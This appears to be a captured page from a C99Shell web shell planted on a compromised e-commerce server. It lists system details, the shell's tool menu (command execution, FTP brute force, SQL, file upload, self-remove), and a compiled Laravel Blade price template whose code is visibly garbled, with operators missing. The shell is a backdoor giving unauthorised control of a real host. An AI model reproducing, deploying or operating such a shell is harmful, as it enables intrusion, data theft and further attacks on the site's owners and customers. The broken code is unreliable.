!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/storage/framework/views/   drwxr-xr-x
Free 27.12 GB of 117.98 GB (22.98%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     5989c7ad83db045045995e04e57d8e295ea94fe8.php (2.37 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php if(!$product->isGroupedProduct() && !$product->isExternalProduct()): ?>
<div id="countDown" class="display-none">
    <p class="text-sm mt-1.5 pt-1p dm-sans font-medium text-gray-12"><?php echo e(__('Offer end in')); ?>:</p>
    <div class="w-full flex roboto-medium mt-3">
        <div class="border border-dashed border-gray-12 rounded primary-bg-color">
            <p class="text-center px-2 text-sm text-black py-1" id="count_days">

            </p>
        </div>
        <div class="border border-dashed border-gray-12 rounded primary-bg-color <?php echo e(languageDirection() == 'ltr' 'ml-2.5' 'mr-2.5'); ?>">
            <p class="text-center px-2 text-sm text-black py-1" id="count_others">

            </p>
        </div>
    </div>
</div>
<?php endif; ?>
<div class="md:mt-3 mt-2">
    <p class="dm-bold font-700">
        <?php if(!$product->isGroupedProduct()): ?>
        <?php if($product->isVariableProduct()): ?>
            <?php
                $sale_price 
$sale_price[0] ?? $sale_price;
                
$regular_price $regular_price[0] ?? $regular_price;
            
?>
            <span class="text-2.5xl text-gray-12" id="varMinMaxPrice"><?php echo e(formatNumber($filterVariation['min'])); ?> - <?php echo e(formatNumber($filterVariation['max'])); ?></span>
        <?php endif; ?>
        <span class="text-2.5xl text-gray-12 <?php echo e($product->isVariableProduct() ? "display-none" ''); ?>" id="item_price"><?php echo e($offerFlag $product->priceWithTax($displayPrice'sale') : $product->priceWithTax($displayPrice'regular')); ?></span>
        <span class="text-28 text-gray-10 display-none">/</span>
        <?php if($offerFlag || $product->isVariableProduct()): ?>
            <span class="text-gray-10 line-through <?php echo e($product->isVariableProduct() ? "display-none" ''); ?>" id="item_offer_price"><?php echo e($product->priceWithTax($displayPrice'regular')); ?></span>
        <?php endif; ?>
        <?php elseif($product->isGroupedProduct()): ?>
            <span class="text-gray-12 text-28 leading-6"><?php echo e(formatNumber($groupProducts['min'])); ?> - <?php echo e(formatNumber($groupProducts['max'])); ?></span> </br>
        <?php endif; ?>
    </p>
</div>
<?php /**PATH /home/picotech/domains/ecom1.picotech.app/public_html/resources/views/site/layouts/section/product-details/offer.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--